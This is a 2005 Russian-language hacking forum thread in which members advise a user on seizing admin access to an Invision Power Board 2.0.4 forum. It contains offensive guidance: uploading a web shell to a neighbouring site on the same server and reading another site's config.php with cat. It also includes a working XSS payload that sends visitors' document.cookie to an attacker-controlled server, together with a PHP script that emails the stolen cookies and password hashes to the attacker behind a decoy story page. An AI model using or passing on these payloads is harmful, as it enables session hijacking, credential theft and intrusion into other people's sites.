как получить админские сессии в Ipb 2.0.4?

Discussion in 'Песочница' started by Danya, 1 Dec 2005.

  1. Danya

    Danya Banned

    Joined:
    27 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    А есть какой нибудь эксплойт или способ получить админские сессии в Ipb 2.0.4.?
     
  2. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    Попробуй скачать сплоит с www.rst.void.ru
    Он тебе выдаст хэш с какойто двойной зашифровкой.
    Если с ним позаморачиваться то можно узнать хэш который легко расшифровывается в PasswordPro И уже с пасом можешь бороздить по админским просторам :)
     
  3. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Exploit DO 2.0.4, v 2.0.4 vrode netu sqlinj
     
  4. Danya

    Danya Banned

    Joined:
    27 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    2 Барсик

    я не совсем поняла? всмысле так я получу хеш пасса админа с солью? дык он у меня уже есть :) бручу уже третьи сутки :))) и очень сомневаюсь что расбручу. у меня немного другая заморочка- как поиметь доступ к админской панели без расшифрованого пасса )))))
     
  5. Danya

    Danya Banned

    Joined:
    27 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    2Green_Bear

    извини я немного туплю, но что ты сказал? :-D вторую чать я поняла, что в 2.0.4 sqlиньекций нету, а вот что это такое - Exploit DO 2.0.4? это так експлойт называется? :))) и если да, то чето я в поисковике ничего похожего найти пока немогу
     
  6. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    А никак. Чтоб в админку попасть надо знать пасс админа.
     
  7. MageDealer

    MageDealer Elder - Старейшина

    Joined:
    18 Jul 2005
    Messages:
    113
    Likes Received:
    18
    Reputations:
    22
    DO 2.0.4
    до 2.0.4
    < 2.04
     
  8. Danya

    Danya Banned

    Joined:
    27 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    ну хорошо. что то у меня досих пор ничего не получается. какие вообще есть варианты получения админки в форумах (неважно каких) без расшифрованого пасса?
     
  9. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Залить шелл на какой-нибудь простенький сайт на том-же серваке (узнать на domaindb.net), а от туда уже танцевать. Но это уже другая тема.
     
  10. Danya

    Danya Banned

    Joined:
    27 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    2Azazel
    угу. спасибо. тогда уж удьте так любезны, если вдруг тут обсуждлось нечто подобное, киньте хоть название топика. потому что по поисковику тут я не нашла. а весь форум читать буду очень долго
     
  11. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    >>> форум читать буду очень долго
    Долго, но полезно :)

    А насчёт ссылочки - ну не описывается это всё нигде в одной теме + от многих вещей зависит.

    Это же всё-таки не инструкция к микроволновой печке. :)
     
    #11 Azazel, 4 Dec 2005
    Last edited: 4 Dec 2005
  12. Danya

    Danya Banned

    Joined:
    27 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    ехххх... ну и на том спасибо... хотя для человека который всего неделю назад узнал что такое експлойт и что такое командная строка - слишком много иноформации ((((
     
  13. Danya

    Danya Banned

    Joined:
    27 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    2Azazel

    мнээээ.. я тут подумала... это всмысле залить шелл, получить доступ к базе и посмотреть там сессии (если они конечно там пишутся)? я правильно думаю или чушь сморозила?
     
  14. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    454
    Likes Received:
    212
    Reputations:
    168
    Правильно...Тока в админке можна и хеши посмотреть на юзерей...
     
  15. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Правильно, правильно: хэши и соль от паролей можно посмотреть. А так, толку от XSS на вторых версиях по моему мало.
     
  16. Lord Nikon

    Lord Nikon Banned

    Joined:
    12 Sep 2005
    Messages:
    224
    Likes Received:
    15
    Reputations:
    -3
    это называется атака через соседа,помню в каком то номере журнала хакер была такая тема =).
     
  17. Danya

    Danya Banned

    Joined:
    27 Nov 2005
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    через шелл не пробовала и не буду. чтобы получить доступ к базе, надо хотябы знать ее название, рута и пасс...короче инахх (((
     
    #17 Danya, 8 Dec 2005
    Last edited by a moderator: 8 Dec 2005
  18. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Зря ты так. Заливаем шелл на тот же сервак. Выполняем комманду pwd
    Получаем примерно /my/seycas/na/site/111/www/html/
    Потом пишем cat /my/seycas/na/site/222/www/html/config.php и получаем то что ты хочешь знать.
    Теоретически - это сработает. Практически, зависит от сервера.
     
  19. Alias

    Alias New Member

    Joined:
    13 Nov 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    как делал я

    Если форум поддерживает закачку html фаиликов к топикам то простой выход это - создаем топик(с максимально популярной темой) внутри которого находиться строчка типа: <script language=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>

    затем заливаем на сервак который указали: фаилик test.php(c интересной историей например):
    <?php
    if(isset($QUERY_STRING));
    {
    $date=date('d.m.y:H:i:s');
    mail("ваше@мыло.ru","New Coookie","Date and Time:$date\nIP:$REMOTE_ADDR\nAdress:$HTTP_REFERER\nCookie:$QUERY_STRING");
    }
    header('Content-Type=text/html\n\n\n\n');
    echo "<html><head><meta http-equiv=\"content-type\" content=\"text/html; charset=windows-1251\"><title>story</title></head><body><pre>" .
    "Есть у меня друг Костя, большой любитель представительниц женского пола.\n" .
    "Если мы шли гулять и Костя не трахнул новую девушку - то вечер считался\n" .
    "прожитым зря. И вот однажды на дискотеке Костя встретил ЕЁ. ОНА была\n" .
    "достаточно симпатичной особой, к тому же, как и Костя, разведенной.\n" .
    "Спустя месяц Костя сообщил мне, что собирается на НЕЙ жениться. Мало\n" .
    "того, он сообщил, что \"завязал\", что уже давно не ходит по барам и\n" .
    "вообще больше \"баб не цепляет\".\n" .
    " \n" .
    "Гоша Севастопольский" .
    "</pre></body></html>";
    ?>

    в результате на мыло приходят cookies с хешами паролей )) просто и сердито.

    Естественно удача тут очень сильно влияет
     
    #19 Alias, 8 Dec 2005
    Last edited: 8 Dec 2005
  20. Гаврила

    Гаврила Elder - Старейшина

    Joined:
    24 Oct 2005
    Messages:
    273
    Likes Received:
    89
    Reputations:
    17
    Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/tyui.gif ,то как будет выглядеть эта строка
    <scriptlanguage=JavaScript>document.location.href="http://www.vash_server.ru/test.php?"+document.cookie</script>
     
    #20 Гаврила, 9 Dec 2005
    Last edited: 10 Dec 2005
Loading...
Similar Threads - получить админские сессии
  1. Torchin
    Replies:
    4
    Views:
    3,024